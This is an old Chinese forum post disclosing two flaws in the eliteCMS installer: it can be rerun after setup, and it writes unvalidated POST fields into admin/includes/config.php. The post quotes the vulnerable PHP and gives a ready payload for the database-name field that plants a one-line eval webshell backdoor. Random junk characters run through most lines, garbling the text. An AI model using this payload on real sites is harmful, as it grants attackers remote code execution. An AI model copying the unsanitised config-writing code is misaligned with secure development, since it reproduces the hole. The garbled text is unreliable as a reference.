eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
- q8 y, l* ^+ t4 q
0 N9 D3 T6 g, ~, w另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php; Y8 Q* V0 ?9 l. ~8 r
我们来看代码:) K1 ?, c# {/ M
8 X" b1 f0 S [6 L- Q* w...; h5 {. b6 x: y1 j# D
elseif ($_GET['step'] == "4") {* H, [' v4 ?' e4 L+ L7 M) X
$file = "../admin/includes/config.php";
" {; q) t) s/ M7 F! L) m $write = "<?php\n";; e; M+ z+ K7 T7 T. ~/ w
$write .= "/**\n";
9 ~; F; x6 Y% v* K4 x# O $write .= "*\n";" N. Q! d& N0 ~9 j0 L/ c
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
. z) ^ W( [7 n0 W6 ]...略...9 V+ I8 V+ c' ^5 n3 s8 k& D
$write .= "*\n";0 `6 O+ Y3 I! H" O: W) c
$write .= "*/\n";' X( \% ^, B& @& h' x7 ?4 P
$write .= "\n";
4 u# ~' i. h8 n$ x4 X3 y) q3 F $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
8 c" d1 j, T: x2 Y5 u) g0 V$ k $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% j1 L S6 w, W8 B $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";9 d- L, @5 {. h, [# B& H
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";8 k! Z2 V, n, z! G2 w- h5 q% M
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";& d! z& M" C/ `
$write .= "if (!\$connection) {\n";
9 V) p. o' g- [" B5 Y( b3 T" Q $write .= " die(\"Database connection failed\" .mysql_error());\n";
9 t! V3 ?" @& B2 O; L5 ~, v8 o7 k $write .= " \n";, }" s7 o' o# |" x8 j
$write .= "} \n";6 p9 v# j& C4 `2 \& H' W+ p0 V' {
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
8 \8 n! E2 x0 w5 x. s: e! W $write .= "if (!\$db_select) {\n";' F; ]. _5 B, ]! h0 ~$ C8 n) ~" H
$write .= " die(\"Database select failed\" .mysql_error());\n";6 r1 [6 ^' S$ \# ]! j$ c
$write .= " \n";' A: O) q" @$ H
$write .= "} \n";* m+ I' W! N1 C( Y4 C1 |
$write .= "?>\n";/ l- G6 k" Y" Z; [4 f+ U7 e) n1 D( {
9 r2 |! ?- O0 H4 r! U$ w $writer = fopen($file, 'w');) e6 ]( r7 a; D+ p- v- M9 f5 S
...2 U. V1 y1 l! a' B! l6 }
/ T1 ?5 S. a | p% H5 k
在看代码:
; M/ h5 w- S' d" {" M3 ?; D
0 t' l& [( L1 j g3 g$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
0 V E, R$ N2 ^5 O8 g# i" L$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
9 g4 A! g4 k3 F ]7 @$_SESSION['DB_USER'] = $_POST['DB_USER'];! H4 _6 T, |$ S9 |! f; [4 M
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
! H5 X# }! r' d1 o; C 8 }& n3 k# l% c. y7 x W* V6 d
取值未作任何验证
$ M6 Y7 N4 X- l4 Q如果将数据库名POST数据:* b4 v0 g, A0 w N* t- B$ M$ O
9 V# B0 Q% f% J4 T' C"?><?php eval($_POST[c]);?><?php' Y& }; N) f- v8 G. G$ a
" L4 ]' I* N! D! }6 A
将导致一句话后门写入/admin/includes/config.php2 E% a$ j) e1 y
|
发表于 2012-11-18 13:59:27
收藏
支持
反对